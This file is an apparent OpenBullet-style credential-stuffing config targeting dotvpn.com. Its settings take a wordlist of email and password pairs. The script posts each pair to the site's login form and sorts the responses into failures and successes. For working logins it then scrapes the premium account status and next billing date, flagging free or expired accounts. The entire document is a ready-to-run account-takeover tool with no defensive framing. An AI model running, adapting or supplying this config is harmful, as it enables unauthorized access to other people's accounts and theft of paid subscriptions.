[SETTINGS]
{
  "Name": "dotvpn.com",
  "SuggestedBots": 5,
  "MaxCPM": 0,
  "LastModified": "2019-05-17T11:48:07.8767219+02:00",
  "AdditionalInfo": "",
  "Author": "MOMO",
  "Version": "1.1.2",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://dotvpn.com/en/signin/" 
  CONTENT "email=<USER>&password=<PASS>&submit=Sign+In" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: dotvpn.com" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Origin: https://dotvpn.com" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36 Maxthon/5.1.3.2000" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "DNT: 1" 
  HEADER "Referer: https://dotvpn.com/en/signin/" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: it-IT" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password" 
  KEYCHAIN Success OR 
    KEY "Log Out</" 

REQUEST GET "https://dotvpn.com/en/premium/manage" 
  
  HEADER "Host: dotvpn.com" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36 Maxthon/5.1.3.2000" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "DNT: 1" 
  HEADER "Referer: https://dotvpn.com/en/" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: it-IT" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "Expired" 
  KEYCHAIN Custom "FREE" OR 
    KEY "Start DotVPN Premium" 

PARSE "<SOURCE>" LR "account</div>" "</div>" -> CAP "Premium account" 

PARSE "<SOURCE>" LR "div class=\"toptext\">Next billing</div>" "</div>" -> CAP "Next billing" 

